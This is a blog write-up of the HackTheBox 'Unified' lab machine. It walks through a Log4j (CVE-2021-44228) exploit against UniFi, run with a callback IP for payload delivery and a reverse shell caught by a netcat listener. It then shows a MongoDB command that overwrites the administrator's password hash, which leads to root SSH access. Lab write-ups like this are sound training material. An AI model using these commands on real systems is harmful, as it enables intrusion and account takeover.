Open in app

Sign in

Write

Sign in

Unified WriteUp | HackTheBox

Onurcan Genç
7 min readMar 1, 2024

--

Hello everyone! Today, I am going to analyze a tier 2 machine called Unified. As you are aware, before beginning, I will check if we have a running web application.

1) Initial Findings

  • To start, I attempted to use the WhatWeb tool, which is a next-generation web scanner. However, it did not work since there were no active services on ports 443 and 80. Therefore, I decided to proceed with port scanning.
After I solved machine, it automatically terminated itself. That’s why, I created new instance because of that reason. Therefore, IP address has been changed.
After I solved the machine, it automatically terminated itself. Consequently, I created a new instance, resulting in a change in the IP address.

2) Port Scanning

I utilized my standard nmap syntax as follows:

sudo nmap -sV -Sc [IP ADDRESS]

Note: This approach may be time-consuming, as sometimes services may be deployed on non-default ports such as 45323 or 12675. Therefore, I highly recommend applying the full-scan parameter and optionally adding the verbosity option to reduce time wastage during the CTF engagement. Additionally, if using nmap without specifying a valid port range or specific port numbers, it will default to scanning the top 1000 ports.

  • In my scenario, as there was no web app initially, I decided to conduct a full scan against our machine.
To allocate time for other tasks, I promptly checked each port to determine if there was a web app present.
  • After testing every port that appeared active, I found that port 8443 was open. However, I encountered typical SSL/TLS errors, which are commonly encountered. Therefore, there is no need to worry; simply proceed by accepting the risk and continuing.
My browser did not recognize the certificate as valid.
  • Subsequently, I identified a web app called UniFi, which serves as an authentication mechanism dependent on that app. Further research revealed that this web app allows users to control devices on the network, similar to a “Modem Arayüzü” in Turkish.
Despite trying millions of wordlists, I was unable to breach it.
  • However, I became curious about UniFi version 6.4.54 and discovered valuable information about a vulnerability in that version.

CVE-2021–44228

OffSec's Exploit Database Archive

Apache Log4j 2 - Remote Code Execution (RCE). CVE-2021-44228 . remote exploit for Java platform

www.exploit-db.com

GitHub - puzzlepeaches/Log4jUnifi: Exploiting CVE-2021-44228 in Unifi Network Application for…

Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more. - puzzlepeaches/Log4jUnifi

github.com

For manual exploitation, I found another resource:

Another Log4j on the fire: Unifi | Sprocket Security

By now, you're probably well aware of a recently disclosed vulnerability for the Java logging library, Log4j. The…

www.sprocketsecurity.com

3) Exploitation

Initially, I found two approaches for the CTF, one for automated exploitation and the other manual. I decided to use the automated method since I found a public exploit on GitHub. Although a manual approach exists, it is more complicated. However, I will provide a manual writeup after presenting the solution.

  • I found a repository that directly invokes Remote Code Execution (RCE).
I installed the related requirements on my local machine. The repository also provides instructions on using our exploit.
  • The repo also explains the usage of our exploit.

Usage

usage: exploit.py [-h] -u URL -i CALLBACK -p PORT

optional arguments:
  -h,     --help            show this help message and exit
  -u URL, --url URL     Unifi Network Manager base URL
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.

Example usage:
python3 exploit.py -u https://unifi.acme.com:8443 -i 10.10.10.1 -p 4444

After the -i parameter, you must use your VPN IP address, which is our tun0 address. The port can be any value since we will deploy a netcat listener to receive the shell.

you can fire both netcat listener and our exploit respectively.

Upon firing both the netcat listener and our exploit, the exploit will display a prompt with the message “Firing payload!”. You can also see how our exploit spawned a part below:

The typical RCE and our shell appeared.
  • Before proceeding with the discovery of our machine, I wanted to identify which shell we were using to upgrade it for increased flexibility and speed.
  • To determine the shell type, I executed the following command::
echo $SHELL // Brings us a shell type
we got this !
  • After we identified our shell, I decided to upgrade my shell using this source since it is not suitable to apply direct python command since I could not get necessary information whether the machine has built-in python.
I couldn’t ascertain whether the target had Python or Python 2 installed.
As you can see here, there was not any information related to installed packages on target.

That’s why, I called a environment variable called “SHELL” and by default I set /bin/bash as a default shell. Moreover, The “script” command is used to record terminal sessions. “/dev/null” is a special file in Unix-like operating systems that discards all data written to it. By the way, you can search for user flag by just moving /home/ directory.

4) Post Exploitation

  • As you remember, we have authenticated our machine via our Log4J exploit. After all this, I have tried to execute linpeas script on our machine. However, It did not work since our machine did not have “wget” command as a built-in tool.
Unfortunately :(

PEASS-ng/linPEAS at master · carlospolop/PEASS-ng

PEASS - Privilege Escalation Awesome Scripts SUITE (with colors) - PEASS-ng/linPEAS at master · carlospolop/PEASS-ng

github.com

  • After thorough research, I discovered that the CTF required us to interact directly with the non-relational MongoDB database. Although I’m familiar with MySQL, I lacked experience with MongoDB. Nevertheless, I searched for how to authenticate on our MongoDB server, primarily using a terminal interface.
  • The manual page of MongoDB provided a solution, but first, I needed to determine which port MongoDB was using.

To accomplish this, I utilized a useful command on GNU/Linux distributions and avoided manual searching by piping with the grep operation on our target terminal.

ps aux | grep mongodb

Since it could not be seen clear. I wanted to add also the port number for the PoC (Proof Of Concept)

After identifying the required port, I initiated our MongoDB connection:

mongo --port 27117
As you can see from the top part of the terminal, We can authenticated.
  • Authentication was successful, thanks to ChatGPT, making finding the MongoDB syntax straightforward.

I could not move after that progress ,so I moved through this reference again for the mongodb part:

There was a payload which always forces to mongodb connect every time. Instead, I was going to apply just the database command.

db.admin.find().forEach(printjson);
we want to move towards admin collection and query all the documents using JSON format. I also applied without the forEach() function part ,but it was really seem to bad.
Since the given hash format indicates the SHA-512 encryption.
  • Moreover, It was not a good idea to bruteforce on our hash using rockyou.txt using john and applying on decryption websites.
  • I assumed that we can access through the admin collection ,so we can also update or delete operations on our DB. However, how am I able to generate sha-512 pass on our Kali VM.
echo -n "your_string_here" | sha512sum // you cannot apply this command since 
                                          sha512sum does not apply $6$ part.

Because of that reason, I asked chatGPT for another method for that way.

mkpasswd --method=sha-512 // it is not best practise

I used manual page and searched for -m which is method. (man mkpasswd)
  • After that we can create our payload using these:
db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set{"x_shadow":"$6$epfPASDVANkEIU42$jR90CIAu1jCYFO9ErMjyMHl3AzXU8BdFqklbEFH4YdVrv.5I8rTE3msPXxCU4nv06PBIIXXsbuELKUdbv2HQk/"}})
  • These are the same objects and can be created by using any AI tools. No need to know how to update objects in non-relational db.

Note: The purpose of this application is for the password replication purposes by using our SHA-512 generated text which is CTIS in my condition.

If the modification succeed, you will get this message:

“nMatched” means that yes I can find the correct match using your payload. “nModified” means that yes I can successfuly updated necessary modification.

Last attempt, we can try to authenticate by using our brand new credentials:

administrator
CTIS
It took some time to authenticate.

After surfing on this “modem interface like website”. I found ssh user:pass through just by clicking highlighted section “Site”.

After this you can instantly use this command to connect through SSH:

ssh root@10.129.58.253

pass: CTIS

if you just make ls -l, then you will find the root flag.

I am grateful for taking the time to read my writeup !

May The Pentest Be With You !

My social media accounts:

https://www.instagram.com/onurcan.gnc/

https://twitter.com/onurcangenc1999

https://www.linkedin.com/in/onurcangnc/

Capture The Flag
Penetration Testing
Offensive Security
Kali Linux
Hackthebox

--

--

Onurcan Genç
Onurcan Genç

Written by Onurcan Genç

175 Followers
140 Following

Offensive Security Specialist | Tech Enthusiast Welcome to my playground !

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams